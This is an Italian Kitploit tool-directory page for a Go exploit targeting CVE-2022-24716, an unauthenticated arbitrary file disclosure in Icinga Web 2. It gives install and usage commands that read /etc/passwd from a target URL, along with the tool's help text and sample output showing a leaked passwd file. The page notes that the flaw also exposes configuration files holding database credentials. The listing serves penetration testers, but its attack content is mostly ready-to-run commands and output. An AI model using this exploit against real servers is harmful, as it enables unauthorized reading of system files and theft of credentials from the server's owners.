Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2022-24716-2 — CVE-2022-24716 (Divulgazione arbitraria di file Icingaweb2) | Kitploit
Strumenti/GitHubGitHub/gmh5225/cve-2022-24716-2
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebRaccolta InformazioniPenetration Testing
GitHubgmh5225/cve-2022-24716-2

CVE-2022-24716-2

CVE-2022-24716 (Divulgazione arbitraria di file Icingaweb2)

Vedi Repository
122 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2022-24716

Icinga Web 2 è un'interfaccia web di monitoraggio open source, un framework e un'interfaccia a riga di comando. Gli utenti non autenticati possono divulgare il contenuto di file di sistema locali accessibili dall'utente dal server web, inclusi i file di configurazione di icingaweb2 con le credenziali del database.

  • Installazione
  • Utilizzo
  • Esecuzione di CVE-2022-24716

Installazione

CVE-2022-24716 richiede golang e per scaricarlo basta usare:

root@kitploit:~
go install -v github.com/joaoviictorti/CVE-2022-24716@latest

Utilizzo

root@kitploit:~
go run .\CVE-2022-24716.go -u http://localhost -f /etc/passwd 
go run .\CVE-2022-24716.go -u http://localhost -f /etc/passwd -p http://127.0.0.1:8080

Questo mostrerà l'aiuto per lo strumento. Ecco tutti gli switch supportati:

root@kitploit:~
usage: CVE-2022-24716 [-h|--help] -u|--url "<value>" -f|--file "<value>"
                      [-p|--proxy "<value>"]

                      CVE-2022-24716 - Arbitrary File Disclosure

Arguments:

  -h  --help   Print help information
  -u  --url    Insert url
  -f  --file   Insert file
  -p  --proxy  Insert proxy

Esecuzione di CVE-2022-24716

root@kitploit:~
go run .\CVE-2022-24716.go -u http://icinga.cerberus.local:8080 -f /etc/passwd  

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
......
Scarica lo strumento